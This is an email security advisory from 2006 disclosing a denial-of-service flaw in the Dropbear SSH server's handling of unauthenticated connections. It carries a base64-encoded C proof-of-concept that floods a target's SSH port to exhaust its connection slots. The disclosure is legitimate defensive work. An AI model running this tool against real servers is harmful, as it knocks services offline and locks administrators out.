Subject: Dropbear SSH server Denial of Service
From: Pablo Fernandez <pablo@littleQ.net.>
To: [email protected], [email protected]
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-PR0S3PBz56GZBu8761YR"
Date: Tue, 07 Mar 2006 19:47:57 +0000
Message-Id: <1141760877.12514.2.camel@localhost.localdomain.>
Mime-Version: 1.0
X-Mailer: Evolution 2.4.2.1
X-Virus-Scanned: antivirus-gw at tyumen.ru
--=-PR0S3PBz56GZBu8761YR
Content-Type: multipart/mixed; boundary="=-Jeb9FFSw3QF/EEAh/FxP"
--=-Jeb9FFSw3QF/EEAh/FxP
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Dropbear SSH server Denial of Service
Credits: Pablo Fernandez
March 7th, 2006
I. BACKGROUND
Dropbear is a relatively small SSH 2 server and client. It runs on a
variety of POSIX-based platforms. Dropbear is open source software,
distributed under a MIT-style license. Dropbear is particularly useful
for "embedded"-type Linux (or other Unix) systems, such as wireless
routers.
More information is available at
http://matt.ucc.asn.au/dropbear/dropbear.html
II. DESCRIPTION
Denial of service is possible and could be trivialy launched by a remote
attacker.
The vulnerability specifically exists due to a design error in the
authorization-pending connections code. By default and as a #define of
the MAX_UNAUTH_CLIENTS constant, the SSH server allows 30
authorization-pending connections, after connection 31, incoming sockets
are close()d immediatly.
Vulnerable code is in svr-main.c
/* check for max number of connections not authorised */
for (j =3D 0; j < MAX_UNAUTH_CLIENTS; j++) {
if (childpipes[j] < 0) {
break;
}
}
if (j =3D=3D MAX_UNAUTH_CLIENTS) {
/* no free connections */
/* TODO - possibly log, though this would be an easy way
* to fill logs/disk */
close(childsock);
continue;
}
III. ANALYSIS
Remote attack of this vulnerability is trivial. This is specially
problematic if the administrator can't login due to the attack and can't
at least blacklist the attacker, restart the service or undertake other
actions.
IV. DETECTION
All versions (up to and including current 0.47 version) are vulnerable.
The following distributions are known to use or package Dropbear:
* LEAF Bering uClibc - a small Linux firewall/network applicance
distribution.=20
* NetBSD Packages Collection=20
* Debian=20
* FreeBSD Ports=20
* Gentoo Packages=20
* OpenWRT - a very nice distro for WRT54G wireless routers (and
others).=20
* FREESCO is is a single floppy NAT/firewall router/server.=20
* Bent Linux - a uClibc based Linux distribution, statically
linked cpio.bz2 packages (should work on any distro)=20
* fli4l - a one-disk-router Linux distribution=20
* OpenZaurus - custom Linux for the Sharp Zaurus=20
* floppyfw - a single floppy firewall Linux distribution=20
* ttylinux - Linux to fit in 4 megabytes of disk space and run on
386es, as an internet terminal=20
* Sisela - single floppy Linux router/wireless AP distro=20
* gumstix - tiny embedded Linux boards=20
* OpenSimpad - Linux for the Siemans SIMpad, packages here
upgrade for Linksys WiFi routers=20
* Slackmatic=20
* Coyote Linux - a single floppy firewall=20
* Trinux - a lightweight Linux security toolkit=20
* Familiar ipkg - for handhelds=20
* Source Mage - a distribution of GNU/Linux, Dropbear is available
as a spell.=20
* Netcomm NB5 ADSL router - this runs Dropbear out of the box.=20
* Dreambox linux-based DVB recorder has Dropbear on the default
firmware.=20
* kboot - a proof-of-concept Linux boot loader.
V. WORKAROUND
Administrators running dropbear should wait for a fix from the vendor.
In the mean time, firewalling the SSH server allowing incoming
connections just from trusted sources is adviced.
VI. VENDOR RESPONSE
The vendor has been notified and a solution is under development.
VII. CVE INFORMATION
A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.
VIII. DISCLOSURE TIMELINE
30/01/2006 Initial vendor notification
07/03/2006 Public disclosure
IX. CREDIT
Pablo Fernandez <pablo at littleQ.net> is credited with this discovery.
--=20
Pablo Fernandez Lopez
http://www.littleQ.net/
GPG: http://www.littleQ.net/pablo.asc
Fingerprint: 14A0 8343 E8FB E940 59E3 F7BB C347 869D DBB9 337F
--=-Jeb9FFSw3QF/EEAh/FxP
Content-Disposition: attachment; filename=dropbear-PoC.c
Content-Transfer-Encoding: base64
Content-Type: text/x-csrc; name=dropbear-PoC.c; charset=us-ascii
LyoqDQogKiBkcm9wYmVhci1Qb0MuYyAtLSBQcm9iZSBvZiBDb25jZXB0LCBEb1MgRHJvcGJlYXIg
U1NIIHNlcnZlcg0KICoNCiAqIEF1dGhvcjogUGFibG8gRmVybmFuZGV6IDxwYWJsbyBhdCBsaXR0
bGVRLm5ldD4NCiAqDQogKiBnY2MgZHJvcGJlYXItUG9DLmMgLW8gZHJvcGJlYXItUG9DIC1scHRo
cmVhZA0KICogLi9kcm9wYmVhci1Qb0MgLXYgMTkyLjE2OC4wLjENCiAqDQogKiovDQovKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqDQogKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqDQogKiAgIFRoaXMgcHJvZ3JhbSBpcyBm
cmVlIHNvZnR3YXJlOyB5b3UgY2FuIHJlZGlzdHJpYnV0ZSBpdCBhbmQvb3IgbW9kaWZ5ICAqDQog
KiAgIGl0IHVuZGVyIHRoZSB0ZXJtcyBvZiB0aGUgR05VIEdlbmVyYWwgUHVibGljIExpY2Vuc2Ug
YXMgcHVibGlzaGVkIGJ5ICAqDQogKiAgIHRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb247IGVp
dGhlciB2ZXJzaW9uIDIgb2YgdGhlIExpY2Vuc2UsIG9yICAgICAqDQogKiAgIChhdCB5b3VyIG9w
dGlvbikgYW55IGxhdGVyIHZlcnNpb24uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAqDQogKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAqDQogKiAgIFRoaXMgcHJvZ3JhbSBpcyBkaXN0cmlidXRl
ZCBpbiB0aGUgaG9wZSB0aGF0IGl0IHdpbGwgYmUgdXNlZnVsLCAgICAgICAqDQogKiAgIGJ1dCBX
SVRIT1VUIEFOWSBXQVJSQU5UWTsgd2l0aG91dCBldmVuIHRoZSBpbXBsaWVkIHdhcnJhbnR5IG9m
ICAgICAgICAqDQogKiAgIE1FUkNIQU5UQUJJTElUWSBvciBGSVRORVNTIEZPUiBBIFBBUlRJQ1VM
QVIgUFVSUE9TRS4gIFNlZSB0aGUgICAgICAgICAqDQogKiAgIEdOVSBHZW5lcmFsIFB1YmxpYyBM
aWNlbnNlIGZvciBtb3JlIGRldGFpbHMuICAgICAgICAgICAgICAgICAgICAgICAgICAqDQogKiAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAqDQogKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqLw0KDQojaW5jbHVkZSA8c3RkaW8u
aD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNpbmNsdWRlIDx1
bmlzdGQuaD4NCiNpbmNsdWRlIDxnZXRvcHQuaD4NCiNpbmNsdWRlIDxzeXMvcG9sbC5oPg0KI2lu
Y2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxu
ZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+DQojaW5jbHVkZSA8cHRocmVhZC5o
Pg0KDQojZGVmaW5lIE1BWF9TT0NLUyAweGZmZg0KI2RlZmluZSBQT1JUIDIyDQojZGVmaW5lIFRJ
TUVPVVRfSU5fTVNFQ1MgNTAwMCAvKiA1IHNlY29uZHMuLi4gKi8NCg0Kc3RydWN0IGRhdGEgew0K
CWludCBtYXhfdW5hdXRoX2NsaWVudHM7DQoJaW50IHBvcnQ7DQoJaW50IHZlcmJvc2U7DQoJY2hh
ciAqaG9zdDsNCn07DQoNCnZvaWQgc2hvd19oZWxwIChjb25zdCBjaGFyICpuYW1lKQ0Kew0KCWZw
cmludGYoc3RkZXJyLCAiVXNhZ2UgJXMgW09QVElPTlNdIGhvc3QxIFtob3N0Ti4uLl1cbiINCgkJ
CSJcbiINCgkJCSJPcHRpb25zOlxuIg0KCQkJIlx0LS1oZWxwLCAtaCAgICAgICAgICAgICAgICAg
ICAgICAtIFRoaXMgaGVscFxuIg0KCQkJIlx0LS1wb3J0LCAtcCBbUE9SVF0gICAgICAgICAgICAg
ICAtIFBvcnQgdG8gY29ubmVjdCB0byAoZGVmYXVsdHMgdG8gJWQpXG4iDQoJCQkiXHQtLXZlcmJv
c2UsIC12ICAgICAgICAgICAgICAgICAgIC0gVmVyYm9zZSBsZXZlbCAoY2FuIGJlIHVzZWQgbXVs
dGlwbGUgdGltZXMpXG4iDQoJCQkiXG4iDQoJCQkiTm90ZSB0aGF0IGhvc3RzIHNob3VsZCBiZSBz
cGVjaWZpZWQgdXNpbmcgSVAgYWRkcmVzc2VzLCBub3QgaG9zdG5hbWVzXG4iLA0KCQkJbmFtZSwg
UE9SVCk7DQoNCglleGl0KDEpOw0KfQ0KDQp2b2lkICpEb1MgKHZvaWQgKmRhdGEpDQp7DQoJc3Ry
dWN0IGRhdGEgKmQ7DQoJc3RydWN0IHNvY2thZGRyX2luIHNhOw0KCWludCBzb2NrOw0KCWludCBr
aWxsZWQgPSAwOw0KCXN0cnVjdCBwb2xsZmQgZmQ7DQoJc3RydWN0IHRpbWV2YWwgdHYgPSB7IC50
dl9zZWMgPSA1LCAudHZfdXNlYyA9IDAgfTsNCglpbnQgcmV0dmFsOw0KCWludCBpID0gMDsNCg0K
CWQgPSAoc3RydWN0IGRhdGEqKSBkYXRhOw0KDQoJaWYgKGQtPnZlcmJvc2UgPiAxKQ0KCQlwcmlu
dGYoIlsqXSBUYXJnZXQ6ICVzXG4iLCBkLT5ob3N0KTsNCg0KCXNhLnNpbl9mYW1pbHkgICAgICA9
IEFGX0lORVQ7DQoJc2Euc2luX2FkZHIuc19hZGRyID0gaW5ldF9hZGRyKGQtPmhvc3QpOw0KCXNh
LnNpbl9wb3J0ICAgICAgICA9IGh0b25zKGQtPnBvcnQpOw0KDQoJd2hpbGUgKDEpIHsNCgkJaWYg
KChzb2NrID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpIDwgMCkg
ew0KCQkJZnByaW50ZihzdGRlcnIsICJbIV0gVW5hYmxlIHRvIGNyZWF0ZSBzb2NrZXRcbiIpOw0K
CQkJYnJlYWs7DQoJCX0NCg0KCQlpZiAoY29ubmVjdChzb2NrLCAoc3RydWN0IHNvY2thZGRyKikg
JnNhLCBzaXplb2Yoc2EpKSA8IDApIHsNCgkJCWZwcmludGYoc3RkZXJyLCAiWyFdICVzOiBVbmFi
bGUgdG8gY29ubmVjdFxuIiwgZC0+aG9zdCk7DQoJCQlicmVhazsNCgkJfQ0KDQoJCW1lbXNldCgm
ZmQsIDAsIHNpemVvZihzdHJ1Y3QgcG9sbGZkKSk7DQoJCQ0KCQlmZC5mZCAgICAgID0gc29jazsN
CgkJZmQuZXZlbnRzICA9IFBPTExJTjsNCg0KCQlpZiAoKHJldHZhbCA9IHBvbGwoJmZkLCAyLCBU
SU1FT1VUX0lOX01TRUNTKSkgPCAwKSB7DQoJCQlwZXJyb3IoInBvbGwiKTsNCgkJCXJldHVybiBO
VUxMOw0KCQl9DQoNCgkJaWYgKGZkLnJldmVudHMgJiBQT0xMSU4pIHsNCgkJCWNoYXIgYnVmWzUx
Ml07DQoNCgkJCW1lbXNldChidWYsIDAsIHNpemVvZihidWYpKTsNCgkJCXJlYWQoc29jaywgJmJ1
Ziwgc2l6ZW9mKGJ1ZikpOw0KDQoJCQlpZiAoYnVmWzBdICE9IDApIHsNCgkJCQlpZiAoa2lsbGVk
KSB7DQoJCQkJCWlmIChkLT52ZXJib3NlID4gMCkNCgkJCQkJCXByaW50ZigiWyFdICVzIGlzIGJh
Y2sgdXBcbiIsIGQtPmhvc3QpOw0KCQkJCX0gZWxzZSBpZiAoZC0+dmVyYm9zZSA+IDEpDQoJCQkJ
CXByaW50ZigiWytdICVzOiBjb25uZWN0ZWQgJTJkLCAlZFxuIiwgZC0+aG9zdCwgaSsrLCBmZC5y
ZXZlbnRzKTsNCgkJCQkNCgkJCQlraWxsZWQgPSAwOw0KCQkJfSBlbHNlDQoJCQkJZ290byBlcnI7
DQoJCX0gZWxzZSBpZiAoZmQucmV2ZW50cyAmIChQT0xMRVJSIHwgUE9MTEhVUCkpIHsNCmVycjoN
CgkJCWlmICgha2lsbGVkICYmIGQtPnZlcmJvc2UgPiAwKQ0KCQkJCXByaW50ZigiWytdICVzIGhh
cyBiZWVuIERvU2lmaWVkXG4iLCBkLT5ob3N0KTsNCg0KCQkJa2lsbGVkID0gMTsNCgkJfQ0KDQoJ
CWlmIChraWxsZWQpDQoJCQlzbGVlcCg1KTsNCgl9DQoJDQoJcmV0dXJuIE5VTEw7DQp9DQoNCmlu
dCBtYWluIChpbnQgYXJnYywgY2hhciAqKmFyZ3YpDQp7DQoJaW50IHBvcnQgPSBQT1JUOw0KCWlu
dCB2ZXJib3NlID0gMDsNCglpbnQgb3B0Ow0KCWNoYXIgKmhvc3Q7DQoJcHRocmVhZF90ICp0aHJl
YWRzID0gTlVMTDsNCglpbnQgdGFyZ2V0cyA9IDA7DQoJaW50IGk7DQoJc3RydWN0IGRhdGEgKmQ7
DQoJDQoJcHJpbnRmKCJcbiIpOw0KCXByaW50ZigiRHJvcEJlYXIgU1NIIFNlcnZlciBEb1MgUG9D
XG4iKTsNCglwcmludGYoIiAgLS0gYnkgUGFibG8gRmVybmFuZGV6IDxwYWJsbyBhdCBsaXR0bGVR
Lm5ldD5cblxuIik7DQoNCgl3aGlsZSAoMSkgew0KCQlzdGF0aWMgc3RydWN0IG9wdGlvbiBvcHRp
b25zW10gPSB7DQoJCQl7ICJoZWxwIiwgMCwgMCwgJ2gnIH0sDQoJCQl7ICJwb3J0IiwgMSwgMCwg
J3AnIH0sDQoJCQl7ICJ2ZXJib3NlIiwgMCwgMCwgJ3YnIH0sDQoJCQl7IDAsIDAsIDAsIDAgfQ0K
CQl9Ow0KCQlpbnQgYTsNCg0KCQlpZiAoKG9wdCA9IGdldG9wdF9sb25nKGFyZ2MsIGFyZ3YsICJo
cDp2Iiwgb3B0aW9ucywgJmEpKSA8IDApDQoJCQlicmVhazsNCg0KCQlzd2l0Y2ggKG9wdCkgew0K
CQkJZGVmYXVsdDoNCgkJCWNhc2UgJ2gnOg0KCQkJCXNob3dfaGVscChhcmd2WzBdKTsNCgkJCQli
cmVhazsNCgkJCWNhc2UgJ3AnOg0KCQkJCXBvcnQgPSBhdG9pKG9wdGFyZyk7DQoJCQkJYnJlYWs7
DQoJCQljYXNlICd2JzoNCgkJCQl2ZXJib3NlKys7DQoJCQkJYnJlYWs7DQoJCX0NCgl9DQoNCglp
ZiAob3B0aW5kID49IGFyZ2MpIHsNCgkJZnByaW50ZihzdGRlcnIsICJcbkVycm9yOiBIb3N0IG5v
dCBzcGVjaWZpZWRcblxuIik7DQoJCXNob3dfaGVscChhcmd2WzBdKTsNCgkJcmV0dXJuIDA7DQoJ
fQ0KDQoJdGFyZ2V0cyA9IGFyZ2MgLSBvcHRpbmQ7DQoNCglpZiAoKHRocmVhZHMgPSAocHRocmVh
ZF90KikgbWFsbG9jKHRhcmdldHMgKiBzaXplb2YocHRocmVhZF90KSkpIDwgMCkgew0KCQlwZXJy
b3IoIm1hbGxvYyIpOw0KCQlyZXR1cm4gMTsNCgl9DQoNCglpZiAodmVyYm9zZSA+IDIpDQoJCXBy
aW50ZigiWypdICVkIHRhcmdldHNcbiIsIHRhcmdldHMpOw0KDQoJZm9yIChpID0gMDsgb3B0aW5k
IDwgYXJnYzsgaSsrKSB7DQoJCWhvc3QgPSBhcmd2W29wdGluZCsrXTsNCg0KCQlkID0gKHN0cnVj
dCBkYXRhKikgbWFsbG9jKHNpemVvZihzdHJ1Y3QgZGF0YSkpOw0KCQlkLT5wb3J0ICAgICAgICAg
ICAgICAgPSBwb3J0Ow0KCQlkLT52ZXJib3NlICAgICAgICAgICAgPSB2ZXJib3NlOw0KCQlkLT5o
b3N0ICAgICAgICAgICAgICAgPSBzdHJkdXAoaG9zdCk7DQoNCgkJcHRocmVhZF9jcmVhdGUoJih0
aHJlYWRzW2ldKSwgTlVMTCwgRG9TLCBkKTsNCgl9DQoNCglmb3IgKGkgPSAwOyBpIDwgdGFyZ2V0
czsgaSsrKSB7DQoJCXB0aHJlYWRfam9pbih0aHJlYWRzW2ldLCBOVUxMKTsNCgl9DQoNCglyZXR1
cm4gMDsNCn0NCi==
--=-Jeb9FFSw3QF/EEAh/FxP--
--=-PR0S3PBz56GZBu8761YR
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
digitalmente
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQBEDeNtw0eGndu5M38RAuQRAKCzG0lFOIbPlr8yBKP2ZaZ1xnq6jgCgpSBC
gk1lZ6OqpsR57ny3vgSlVcs=
=b5F/
-----END PGP SIGNATURE-----
--=-PR0S3PBz56GZBu8761YR--
